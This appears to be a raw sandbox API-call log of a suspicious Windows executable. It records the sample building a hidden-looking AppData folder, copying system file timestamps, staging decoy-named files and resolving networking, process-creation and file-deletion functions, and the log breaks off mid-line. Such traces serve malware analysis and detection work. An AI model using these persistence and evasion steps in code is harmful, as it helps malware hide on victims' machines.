!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿq\x06~ôlù0", lpUsedDefaultChar=0x0) returned 256 [0032.672] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.672] GetLastError () returned 0x0 [0032.672] SetLastError (dwErrCode=0x0) [0032.672] GetLastError () returned 0x0 [0032.672] SetLastError (dwErrCode=0x0) [0032.672] GetLastError () returned 0x0 [0032.672] SetLastError (dwErrCode=0x0) [0032.672] GetLastError () returned 0x0 [0032.672] SetLastError (dwErrCode=0x0) [0032.672] GetLastError () returned 0x0 [0032.672] SetLastError (dwErrCode=0x0) [0032.672] GetLastError () returned 0x0 [0032.672] SetLastError (dwErrCode=0x0) [0032.672] GetLastError () returned 0x0 [0032.673] SetLastError (dwErrCode=0x0) [0032.673] GetLastError () returned 0x0 [0032.673] SetLastError (dwErrCode=0x0) [0032.673] GetLastError () returned 0x0 [0032.673] SetLastError (dwErrCode=0x0) [0032.673] GetLastError () returned 0x0 [0032.673] SetLastError (dwErrCode=0x0) [0032.673] GetLastError () returned 0x0 [0032.673] SetLastError (dwErrCode=0x0) [0032.673] GetLastError () returned 0x0 [0032.673] SetLastError (dwErrCode=0x0) [0032.673] GetLastError () returned 0x0 [0032.673] SetLastError (dwErrCode=0x0) [0032.673] GetLastError () returned 0x0 [0032.673] SetLastError (dwErrCode=0x0) [0032.673] GetLastError () returned 0x0 [0032.673] SetLastError (dwErrCode=0x0) [0032.673] GetLastError () returned 0x0 [0032.673] SetLastError (dwErrCode=0x0) [0032.673] GetLastError () returned 0x0 [0032.673] SetLastError (dwErrCode=0x0) [0032.673] GetLastError () returned 0x0 [0032.673] SetLastError (dwErrCode=0x0) [0032.673] GetLastError () returned 0x0 [0032.673] SetLastError (dwErrCode=0x0) [0032.673] GetLastError () returned 0x0 [0032.673] SetLastError (dwErrCode=0x0) [0032.673] GetLastError () returned 0x0 [0032.673] SetLastError (dwErrCode=0x0) [0032.673] GetLastError () returned 0x0 [0032.673] SetLastError (dwErrCode=0x0) [0032.673] GetLastError () returned 0x0 [0032.674] SetLastError (dwErrCode=0x0) [0032.674] GetLastError () returned 0x0 [0032.674] SetLastError (dwErrCode=0x0) [0032.674] GetLastError () returned 0x0 [0032.674] SetLastError (dwErrCode=0x0) [0032.674] GetLastError () returned 0x0 [0032.674] SetLastError (dwErrCode=0x0) [0032.674] GetLastError () returned 0x0 [0032.674] SetLastError (dwErrCode=0x0) [0032.674] GetLastError () returned 0x0 [0032.674] SetLastError (dwErrCode=0x0) [0032.674] GetLastError () returned 0x0 [0032.674] SetLastError (dwErrCode=0x0) [0032.674] GetLastError () returned 0x0 [0032.674] SetLastError (dwErrCode=0x0) [0032.674] GetLastError () returned 0x0 [0032.674] SetLastError (dwErrCode=0x0) [0032.674] GetLastError () returned 0x0 [0032.674] SetLastError (dwErrCode=0x0) [0032.674] GetLastError () returned 0x0 [0032.674] SetLastError (dwErrCode=0x0) [0032.674] GetLastError () returned 0x0 [0032.674] SetLastError (dwErrCode=0x0) [0032.674] GetLastError () returned 0x0 [0032.674] SetLastError (dwErrCode=0x0) [0032.674] GetLastError () returned 0x0 [0032.674] SetLastError (dwErrCode=0x0) [0032.674] GetLastError () returned 0x0 [0032.674] SetLastError (dwErrCode=0x0) [0032.674] GetLastError () returned 0x0 [0032.674] SetLastError (dwErrCode=0x0) [0032.674] GetLastError () returned 0x0 [0032.675] SetLastError (dwErrCode=0x0) [0032.675] GetLastError () returned 0x0 [0032.675] SetLastError (dwErrCode=0x0) [0032.675] GetLastError () returned 0x0 [0032.675] SetLastError (dwErrCode=0x0) [0032.675] GetLastError () returned 0x0 [0032.675] SetLastError (dwErrCode=0x0) [0032.675] GetLastError () returned 0x0 [0032.675] SetLastError (dwErrCode=0x0) [0032.675] GetLastError () returned 0x0 [0032.675] SetLastError (dwErrCode=0x0) [0032.675] GetLastError () returned 0x0 [0032.675] SetLastError (dwErrCode=0x0) [0032.675] GetLastError () returned 0x0 [0032.675] SetLastError (dwErrCode=0x0) [0032.675] GetLastError () returned 0x0 [0032.675] SetLastError (dwErrCode=0x0) [0032.675] GetLastError () returned 0x0 [0032.675] SetLastError (dwErrCode=0x0) [0032.675] GetLastError () returned 0x0 [0032.675] SetLastError (dwErrCode=0x0) [0032.675] GetLastError () returned 0x0 [0032.675] SetLastError (dwErrCode=0x0) [0032.675] GetLastError () returned 0x0 [0032.675] SetLastError (dwErrCode=0x0) [0032.675] GetLastError () returned 0x0 [0032.675] SetLastError (dwErrCode=0x0) [0032.675] GetLastError () returned 0x0 [0032.675] SetLastError (dwErrCode=0x0) [0032.675] GetLastError () returned 0x0 [0032.675] SetLastError (dwErrCode=0x0) [0032.676] GetLastError () returned 0x0 [0032.676] SetLastError (dwErrCode=0x0) [0032.676] GetLastError () returned 0x0 [0032.676] SetLastError (dwErrCode=0x0) [0032.676] GetLastError () returned 0x0 [0032.676] SetLastError (dwErrCode=0x0) [0032.676] GetLastError () returned 0x0 [0032.676] SetLastError (dwErrCode=0x0) [0032.676] GetLastError () returned 0x0 [0032.676] SetLastError (dwErrCode=0x0) [0032.676] GetLastError () returned 0x0 [0032.676] SetLastError (dwErrCode=0x0) [0032.676] GetLastError () returned 0x0 [0032.676] SetLastError (dwErrCode=0x0) [0032.676] GetLastError () returned 0x0 [0032.676] SetLastError (dwErrCode=0x0) [0032.676] GetLastError () returned 0x0 [0032.676] SetLastError (dwErrCode=0x0) [0032.676] GetLastError () returned 0x0 [0032.676] SetLastError (dwErrCode=0x0) [0032.676] GetLastError () returned 0x0 [0032.676] SetLastError (dwErrCode=0x0) [0032.676] GetLastError () returned 0x0 [0032.676] SetLastError (dwErrCode=0x0) [0032.676] GetLastError () returned 0x0 [0032.676] SetLastError (dwErrCode=0x0) [0032.676] GetLastError () returned 0x0 [0032.676] SetLastError (dwErrCode=0x0) [0032.676] GetLastError () returned 0x0 [0032.676] SetLastError (dwErrCode=0x0) [0032.676] GetLastError () returned 0x0 [0032.676] SetLastError (dwErrCode=0x0) [0032.677] GetLastError () returned 0x0 [0032.677] SetLastError (dwErrCode=0x0) [0032.677] GetLastError () returned 0x0 [0032.677] SetLastError (dwErrCode=0x0) [0032.677] GetLastError () returned 0x0 [0032.677] SetLastError (dwErrCode=0x0) [0032.677] GetLastError () returned 0x0 [0032.677] SetLastError (dwErrCode=0x0) [0032.677] GetLastError () returned 0x0 [0032.677] SetLastError (dwErrCode=0x0) [0032.677] GetLastError () returned 0x0 [0032.677] SetLastError (dwErrCode=0x0) [0032.677] GetLastError () returned 0x0 [0032.677] SetLastError (dwErrCode=0x0) [0032.677] GetLastError () returned 0x0 [0032.677] SetLastError (dwErrCode=0x0) [0032.677] GetLastError () returned 0x0 [0032.677] SetLastError (dwErrCode=0x0) [0032.677] GetLastError () returned 0x0 [0032.677] SetLastError (dwErrCode=0x0) [0032.677] GetLastError () returned 0x0 [0032.677] SetLastError (dwErrCode=0x0) [0032.677] GetLastError () returned 0x0 [0032.677] SetLastError (dwErrCode=0x0) [0032.677] GetLastError () returned 0x0 [0032.677] SetLastError (dwErrCode=0x0) [0032.677] GetLastError () returned 0x0 [0032.677] SetLastError (dwErrCode=0x0) [0032.677] GetLastError () returned 0x0 [0032.677] SetLastError (dwErrCode=0x0) [0032.677] GetLastError () returned 0x0 [0032.677] SetLastError (dwErrCode=0x0) [0032.678] GetLastError () returned 0x0 [0032.678] SetLastError (dwErrCode=0x0) [0032.678] GetLastError () returned 0x0 [0032.678] SetLastError (dwErrCode=0x0) [0032.678] GetLastError () returned 0x0 [0032.678] SetLastError (dwErrCode=0x0) [0032.678] GetLastError () returned 0x0 [0032.678] SetLastError (dwErrCode=0x0) [0032.678] GetLastError () returned 0x0 [0032.678] SetLastError (dwErrCode=0x0) [0032.678] GetLastError () returned 0x0 [0032.678] SetLastError (dwErrCode=0x0) [0032.678] GetLastError () returned 0x0 [0032.678] SetLastError (dwErrCode=0x0) [0032.678] GetLastError () returned 0x0 [0032.678] SetLastError (dwErrCode=0x0) [0032.678] GetLastError () returned 0x0 [0032.678] SetLastError (dwErrCode=0x0) [0032.678] GetLastError () returned 0x0 [0032.678] SetLastError (dwErrCode=0x0) [0032.678] GetLastError () returned 0x0 [0032.678] SetLastError (dwErrCode=0x0) [0032.678] GetLastError () returned 0x0 [0032.678] SetLastError (dwErrCode=0x0) [0032.678] GetLastError () returned 0x0 [0032.678] SetLastError (dwErrCode=0x0) [0032.678] GetLastError () returned 0x0 [0032.678] SetLastError (dwErrCode=0x0) [0032.678] GetLastError () returned 0x0 [0032.678] SetLastError (dwErrCode=0x0) [0032.678] GetLastError () returned 0x0 [0032.679] SetLastError (dwErrCode=0x0) [0032.679] GetLastError () returned 0x0 [0032.679] SetLastError (dwErrCode=0x0) [0032.679] GetLastError () returned 0x0 [0032.679] SetLastError (dwErrCode=0x0) [0032.679] GetLastError () returned 0x0 [0032.679] SetLastError (dwErrCode=0x0) [0032.679] GetLastError () returned 0x0 [0032.679] SetLastError (dwErrCode=0x0) [0032.679] GetLastError () returned 0x0 [0032.679] SetLastError (dwErrCode=0x0) [0032.679] GetLastError () returned 0x0 [0032.679] SetLastError (dwErrCode=0x0) [0032.679] GetLastError () returned 0x0 [0032.679] SetLastError (dwErrCode=0x0) [0032.679] GetLastError () returned 0x0 [0032.679] SetLastError (dwErrCode=0x0) [0032.679] GetLastError () returned 0x0 [0032.679] SetLastError (dwErrCode=0x0) [0032.679] GetLastError () returned 0x0 [0032.679] SetLastError (dwErrCode=0x0) [0032.679] GetLastError () returned 0x0 [0032.679] SetLastError (dwErrCode=0x0) [0032.679] GetLastError () returned 0x0 [0032.679] SetLastError (dwErrCode=0x0) [0032.679] GetLastError () returned 0x0 [0032.679] SetLastError (dwErrCode=0x0) [0032.679] GetLastError () returned 0x0 [0032.679] SetLastError (dwErrCode=0x0) [0032.679] GetLastError () returned 0x0 [0032.679] SetLastError (dwErrCode=0x0) [0032.679] GetLastError () returned 0x0 [0032.680] SetLastError (dwErrCode=0x0) [0032.680] GetLastError () returned 0x0 [0032.680] SetLastError (dwErrCode=0x0) [0032.680] GetLastError () returned 0x0 [0032.680] SetLastError (dwErrCode=0x0) [0032.680] GetLastError () returned 0x0 [0032.680] SetLastError (dwErrCode=0x0) [0032.680] GetLastError () returned 0x0 [0032.680] SetLastError (dwErrCode=0x0) [0032.680] GetLastError () returned 0x0 [0032.680] SetLastError (dwErrCode=0x0) [0032.680] GetLastError () returned 0x0 [0032.680] SetLastError (dwErrCode=0x0) [0032.680] GetLastError () returned 0x0 [0032.680] SetLastError (dwErrCode=0x0) [0032.680] GetLastError () returned 0x0 [0032.680] SetLastError (dwErrCode=0x0) [0032.680] GetLastError () returned 0x0 [0032.680] SetLastError (dwErrCode=0x0) [0032.680] GetLastError () returned 0x0 [0032.680] SetLastError (dwErrCode=0x0) [0032.680] GetLastError () returned 0x0 [0032.680] SetLastError (dwErrCode=0x0) [0032.680] GetLastError () returned 0x0 [0032.680] SetLastError (dwErrCode=0x0) [0032.680] GetLastError () returned 0x0 [0032.680] SetLastError (dwErrCode=0x0) [0032.680] GetLastError () returned 0x0 [0032.680] SetLastError (dwErrCode=0x0) [0032.680] GetLastError () returned 0x0 [0032.680] SetLastError (dwErrCode=0x0) [0032.680] GetLastError () returned 0x0 [0032.681] SetLastError (dwErrCode=0x0) [0032.681] GetLastError () returned 0x0 [0032.681] SetLastError (dwErrCode=0x0) [0032.681] GetLastError () returned 0x0 [0032.681] SetLastError (dwErrCode=0x0) [0032.681] GetLastError () returned 0x0 [0032.681] SetLastError (dwErrCode=0x0) [0032.681] GetLastError () returned 0x0 [0032.681] SetLastError (dwErrCode=0x0) [0032.681] GetLastError () returned 0x0 [0032.688] SetLastError (dwErrCode=0x0) [0032.688] GetLastError () returned 0x0 [0032.688] SetLastError (dwErrCode=0x0) [0032.688] GetLastError () returned 0x0 [0032.688] SetLastError (dwErrCode=0x0) [0032.688] GetLastError () returned 0x0 [0032.688] SetLastError (dwErrCode=0x0) [0032.688] GetLastError () returned 0x0 [0032.688] SetLastError (dwErrCode=0x0) [0032.688] GetLastError () returned 0x0 [0032.688] SetLastError (dwErrCode=0x0) [0032.688] GetLastError () returned 0x0 [0032.688] SetLastError (dwErrCode=0x0) [0032.688] GetLastError () returned 0x0 [0032.688] SetLastError (dwErrCode=0x0) [0032.688] GetLastError () returned 0x0 [0032.688] SetLastError (dwErrCode=0x0) [0032.688] GetLastError () returned 0x0 [0032.689] SetLastError (dwErrCode=0x0) [0032.689] GetLastError () returned 0x0 [0032.689] SetLastError (dwErrCode=0x0) [0032.689] GetLastError () returned 0x0 [0032.689] SetLastError (dwErrCode=0x0) [0032.689] GetLastError () returned 0x0 [0032.689] SetLastError (dwErrCode=0x0) [0032.689] GetLastError () returned 0x0 [0032.689] SetLastError (dwErrCode=0x0) [0032.689] GetLastError () returned 0x0 [0032.689] SetLastError (dwErrCode=0x0) [0032.689] GetLastError () returned 0x0 [0032.689] SetLastError (dwErrCode=0x0) [0032.689] GetLastError () returned 0x0 [0032.689] SetLastError (dwErrCode=0x0) [0032.689] GetLastError () returned 0x0 [0032.689] SetLastError (dwErrCode=0x0) [0032.689] GetLastError () returned 0x0 [0032.689] SetLastError (dwErrCode=0x0) [0032.689] GetLastError () returned 0x0 [0032.689] SetLastError (dwErrCode=0x0) [0032.689] GetLastError () returned 0x0 [0032.689] SetLastError (dwErrCode=0x0) [0032.689] GetLastError () returned 0x0 [0032.689] SetLastError (dwErrCode=0x0) [0032.689] GetLastError () returned 0x0 [0032.689] SetLastError (dwErrCode=0x0) [0032.689] GetLastError () returned 0x0 [0032.689] SetLastError (dwErrCode=0x0) [0032.689] GetLastError () returned 0x0 [0032.689] SetLastError (dwErrCode=0x0) [0032.689] GetLastError () returned 0x0 [0032.690] SetLastError (dwErrCode=0x0) [0032.690] GetLastError () returned 0x0 [0032.690] SetLastError (dwErrCode=0x0) [0032.690] GetLastError () returned 0x0 [0032.690] SetLastError (dwErrCode=0x0) [0032.690] GetLastError () returned 0x0 [0032.690] SetLastError (dwErrCode=0x0) [0032.690] GetLastError () returned 0x0 [0032.690] SetLastError (dwErrCode=0x0) [0032.690] GetLastError () returned 0x0 [0032.690] SetLastError (dwErrCode=0x0) [0032.690] GetLastError () returned 0x0 [0032.690] SetLastError (dwErrCode=0x0) [0032.690] GetLastError () returned 0x0 [0032.690] SetLastError (dwErrCode=0x0) [0032.690] GetLastError () returned 0x0 [0032.690] SetLastError (dwErrCode=0x0) [0032.690] GetLastError () returned 0x0 [0032.690] SetLastError (dwErrCode=0x0) [0032.690] GetLastError () returned 0x0 [0032.690] SetLastError (dwErrCode=0x0) [0032.690] GetLastError () returned 0x0 [0032.690] SetLastError (dwErrCode=0x0) [0032.690] GetLastError () returned 0x0 [0032.690] SetLastError (dwErrCode=0x0) [0032.690] GetLastError () returned 0x0 [0032.690] SetLastError (dwErrCode=0x0) [0032.690] GetLastError () returned 0x0 [0032.690] SetLastError (dwErrCode=0x0) [0032.690] GetLastError () returned 0x0 [0032.690] SetLastError (dwErrCode=0x0) [0032.690] GetLastError () returned 0x0 [0032.691] SetLastError (dwErrCode=0x0) [0032.691] GetLastError () returned 0x0 [0032.691] SetLastError (dwErrCode=0x0) [0032.691] GetLastError () returned 0x0 [0032.691] SetLastError (dwErrCode=0x0) [0032.691] GetLastError () returned 0x0 [0032.691] SetLastError (dwErrCode=0x0) [0032.691] GetLastError () returned 0x0 [0032.691] SetLastError (dwErrCode=0x0) [0032.691] GetLastError () returned 0x0 [0032.691] SetLastError (dwErrCode=0x0) [0032.691] GetLastError () returned 0x0 [0032.691] SetLastError (dwErrCode=0x0) [0032.691] GetLastError () returned 0x0 [0032.691] SetLastError (dwErrCode=0x0) [0032.691] GetLastError () returned 0x0 [0032.691] SetLastError (dwErrCode=0x0) [0032.691] GetLastError () returned 0x0 [0032.691] SetLastError (dwErrCode=0x0) [0032.691] GetLastError () returned 0x0 [0032.691] SetLastError (dwErrCode=0x0) [0032.691] GetLastError () returned 0x0 [0032.691] SetLastError (dwErrCode=0x0) [0032.691] GetLastError () returned 0x0 [0032.691] SetLastError (dwErrCode=0x0) [0032.691] GetLastError () returned 0x0 [0032.691] SetLastError (dwErrCode=0x0) [0032.691] GetLastError () returned 0x0 [0032.691] SetLastError (dwErrCode=0x0) [0032.691] GetLastError () returned 0x0 [0032.691] SetLastError (dwErrCode=0x0) [0032.691] GetLastError () returned 0x0 [0032.692] SetLastError (dwErrCode=0x0) [0032.692] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0032.692] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0032.692] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0032.693] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f9b0 | out: lpSystemTimeAsFileTime=0x30f9b0*(dwLowDateTime=0xe134ee90, dwHighDateTime=0x1d3dfba)) [0032.694] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x30f8e8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.694] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x30f7d0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.694] GetLastError () returned 0x0 [0032.694] GetLastError () returned 0x0 [0032.694] GetLastError () returned 0x0 [0032.694] GetLastError () returned 0x0 [0032.694] GetLastError () returned 0x0 [0032.694] GetLastError () returned 0x0 [0032.694] GetLastError () returned 0x0 [0032.694] GetLastError () returned 0x0 [0032.694] GetLastError () returned 0x0 [0032.694] GetLastError () returned 0x0 [0032.694] GetLastError () returned 0x0 [0032.694] GetLastError () returned 0x0 [0032.694] GetLastError () returned 0x0 [0032.694] GetLastError () returned 0x0 [0032.694] GetLastError () returned 0x0 [0032.694] GetLastError () returned 0x0 [0032.694] GetLastError () returned 0x0 [0032.694] GetLastError () returned 0x0 [0032.694] GetLastError () returned 0x0 [0032.695] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.695] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0032.695] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.695] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.695] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.695] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.695] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0032.695] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0032.695] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0032.695] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0032.695] GetLastError () returned 0xb7 [0032.695] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.695] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0032.695] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0032.695] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0032.695] wsprintfA (in: param_1=0x30f650, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.696] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0032.696] wsprintfA (in: param_1=0x30f54c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.696] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.696] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0032.696] CloseHandle (hObject=0x74) returned 1 [0032.696] GetLastError () returned 0x0 [0032.696] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0032.696] GetLastError () returned 0x0 [0032.696] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0032.696] GetSystemDirectoryA (in: lpBuffer=0x30f650, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.696] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.696] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0032.696] CloseHandle (hObject=0x74) returned 1 [0032.696] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.697] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.697] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0032.698] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.698] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0032.698] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0032.698] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0032.698] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0032.698] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0032.698] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0032.698] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0032.698] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0032.698] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0032.699] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0032.699] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0032.699] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0032.699] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0032.699] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0032.699] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0032.699] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0032.699] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0032.699] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0032.699] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0032.699] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0032.699] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0032.699] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0032.699] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0032.699] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0032.699] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0032.699] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0032.699] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0032.699] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0032.699] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0032.700] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0032.700] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0032.700] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0032.700] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0032.700] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0032.700] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 